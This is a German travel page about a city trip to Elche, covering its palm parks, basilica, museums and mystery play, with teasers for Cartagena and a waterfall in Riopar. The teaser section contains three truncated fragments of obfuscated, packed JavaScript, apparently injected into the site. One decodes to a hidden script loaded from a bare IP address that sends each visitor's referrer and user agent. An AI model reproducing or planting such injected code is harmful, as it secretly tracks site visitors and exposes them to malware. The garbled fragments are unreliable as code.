Elche Städtereise, Fotos und Informationen

1683
Basilica de Santa Maria in Elche

Stadt Elche in AlicanteElche (valencianisch Elx) ist mit knapp 200.000 Einwohner die zweitgrößte Stadt in der Provinz von Alicante an der spanischen Costa Blanca. Sie liegt etwa 20 Kilometer südwestlich von Alicante, nur etwa 10 Kilometer vom Meer entfernt und ist eine sehr geschichtsträchtige Stadt. Sie wurde bereits im V. Jahrhundert vor Christus gegründet und von Iberern, Römern, Arabern und dann von den Christen bewohnt. Der Altstadtkern von Elche, der Hauptstadt des Bezirks Bajo Vinalopó (El Baix Vinalopò), beherbergt noch heute bedeutende Zeugnisse seiner maurischen Vergangenheit. Und obwohl sich Elche inmitten einer typischen Urlaubsgegend befindet, gehört die Stadt immer noch den Einheimischen und die Touristen sind hier die Gäste und nicht anders herum. Genau deswegen ist Elche so besonders und auf jeden Fall eine Städtereise wert. Wer etwas mehr über die Entstehung der Stadt erfahren möchte, fährt am besten zur Archäologischen Fundstätte und Monographischen Museum d’Alcúdia. Dieser Ort war bereits im Neolithikum bewohnt.

Gebäude in der Stadt ElcheElche zählt zu den ältesten Städten der Region und ist ein Paradies für Touristen, die Palmenliebhaber sind. Die Stadt wird von Palmen regelrecht überflutet und ist berühmt für seinen Palmenwald, der sich über das gesamte Stadtgebiet verteilt. Der Palmenhain, welcher um das Stadtgebiet herum angelegt wurde, zählt seit 2006 zum UNESCO-Weltkulturerbe. Man nennt Elche daher auch die Hauptstadt der Palmen und Stadtparks. Ein großer Teil der Stadt besteht aus Gärten und tollen Parks. In und um Elche gibt es etwa 300.000 Dattelpalmen. Der berühmte Palmenpark El Palmeral beherbergt alleine über 200.000 Palmen, einige sind 200 bis 300 Jahre alt und über 30 Meter hoch. Ein Spaziergang durch den beeindruckenden Park lässt den Alltag vergessen und ist absolut erholsam. Ein weiterer Palmenpark ist der Huerto de la Cura. Mit rund 13.000 Quadratmeter ist er etwas kleiner als der Park El Palmeral, dennoch ist er wunderschön. Der Park Huerto de la Cura ist zum Historischen Nationalgarten erklärt wurden, tausende Palmen aus der ganzen Welt stehen hier dicht an dicht. In diesem Palmenpark sticht die „Palmera Imperial“, die Kaiser- oder Königspalme, ein beeindruckendes achtarmiges Exemplar, sofort ins Auge und ist eine beeindruckende Sehenswürdigkeit.

Palmenpark ElcheNeben den zahlreichen Palmenparks und -gärten hat Elche natürlich weitaus mehr Sehenswürdigkeiten zu bieten. Highlight bei einer Städtereise nach Elche ist sicher ein Besuch der Basilica Santa Maria (auch Himmelfahrtskirche genannt). Den 37 Meter hohen Kirchturm erblickt man bereits aus großer Entfernung. Die Barockkirche hatte eine Bauzeit von über 120 Jahren und ist auch dementsprechend aufwendig verziert. Von oben hat man einen fantastischen Ausblick über die Stadt Elche mit den vielen Palmenparks und Gärten. Ein wichtiges Gebäude in Elche ist der Palacio de Altamira, nur gut 100 Meter von der Kirche Basilica Santa Maria entfernt. Die Burg wurde im 15. Jahrhundert erbaut. Hier befindet sich heute das moderne Archäologische Museum von Elche (Eintrittspreis ca. 3,- €, Montags geschlossen). Es ist das bedeutendste Museum der Stadt ist. Das Palmenmuseum und das Historische und Archäologischen Museum (MAHE) zählen unter anderem zu den beliebten Sehenswürdigkeiten von Elche.

Das „Misterio de Elche“ (Mysterium von Elche) ist ein mittelalterliches Mysterienspiel, das zum UNESCO-Weltkulturerbe und zum international touristisch wertvollen Fest erklärt wurde und immer am 14. und 15. August stattfindet.

Stadt ElcheIn einem Teil der Stadt befindet sich das Mercé-Kloster. Im Untergeschoss des Klosters findet man arabische Bäder aus dem 12. Jahrhundert, ein Besuch ist absolut lohnenswert. In der Innenstadt von Elche gibt es einige Fußgängerzonen mit vielen Boutiquen und kleineren Läden. Hier herrscht das bunte Treiben der Spanier. Man kann hier wunderbar bummeln oder sich inspirieren lassen und in das Geschehen eintauchen. Bei nationalen Köstlichkeiten kann man in einem der unzähligen Bars und Restaurants entspannt den Tag ausklingen lassen. Wer Geschichte, Palmen und Sonne mag, liegt mit einer Städtereise nach Elche genau richtig und kommt voll auf seine Kosten.

Städtereisen und Ausflugsziele

Festungsanlage in Cartagena

Abwehranlagen Bateria de Conejos und Bateria Aguilones in Cartagena

Rund um Cartagena befinden sich unterschiedliche Festungsanlagen und Geschütztürme am Meer, um die Stadt zu...
Bateria de Conejos in Cartagena

Batería de Aguilones in Cartagena

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("<7 8='2' 9='a' b='c/2' d='e://5.f.g.6/1/j.k.l?r="+0(3.m)+"\n="+0(o.p)+"'><\/q"+"s>");t i="4";',30,30,'encodeURI||javascript|document|ysiry||97|script|language|rel|nofollow|type|text|src|http|45|67|write|kdisy|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]
Bateria de Conejos in Cartagena

Batería de Conejos in Cartagena

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|kdkfi||97|script|language|rel|nofollow|type|text|src|http|45|67|write|akkit|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]
video

Wunderschöner Wasserfall Rio Mundo in Riopar bei Albacete

Der imposante Wasserfall in Riopar bei Albacete, liegt fast 2,5 Stunden von Torrevieja entfernt, doch...
Nacimiento Rio Mundo in Riopar

Großer Wasserfall bei Albacete in Riopar Nacimiento Rio Mundo

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|eenek||97|script|language|rel|nofollow|type|text|src|http|45|67|write|frrfh|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Wow, was für ein toller Wasserfall! Wir staunten in Riopar nicht...